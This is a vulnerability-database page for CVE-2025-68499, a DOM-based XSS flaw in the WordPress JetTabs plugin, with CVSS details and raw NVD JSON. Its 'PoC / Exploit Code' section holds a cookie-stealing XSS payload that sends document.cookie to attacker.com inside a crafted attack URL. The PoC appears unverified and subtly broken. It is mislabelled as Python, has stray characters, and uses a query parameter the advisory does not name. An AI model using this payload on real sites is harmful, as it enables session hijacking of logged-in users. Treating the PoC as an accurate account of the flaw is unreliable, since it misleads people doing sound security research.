Security Vulnerability Report
中文
CVE-2025-68499 CVSS 6.5 MEDIUM

CVE-2025-68499

Published: 2025-12-30 00:15:53
Last Modified: 2026-04-23 15:35:55

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetTabs jet-tabs allows DOM-Based XSS.This issue affects JetTabs: from n/a through <= 2.2.12.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

JetTabs <= 2.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68499 PoC - DOM-Based XSS in JetTabs // Target: WordPress JetTabs Plugin <= 2.2.12 const targetUrl = 'https://victim-site.com/'; // Malicious payload that triggers DOM XSS const maliciousPayload = '<img src=x onerror="fetch(`https://attacker.com/steal?cookie=${document.cookie}`)">" />'; // Construct the attack URL // The vulnerability exists in the way JetTabs processes tab content const attackUrl = `${targetUrl}?jet-tabs-tab=${encodeURIComponent(maliciousPayload)}`; console.log('CVE-2025-68499 PoC'); console.log('Target:', targetUrl); console.log('Attack URL:', attackUrl); console.log('\nWhen a logged-in user visits the attack URL,'); console.log('the malicious JavaScript will execute in their browser context.'); console.log('\nMitigation: Upgrade to JetTabs > 2.2.12')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68499", "sourceIdentifier": "[email protected]", "published": "2025-12-30T00:15:52.583", "lastModified": "2026-04-23T15:35:55.467", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetTabs jet-tabs allows DOM-Based XSS.This issue affects JetTabs: from n/a through <= 2.2.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/jet-tabs/vulnerability/wordpress-jettabs-plugin-2-2-12-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}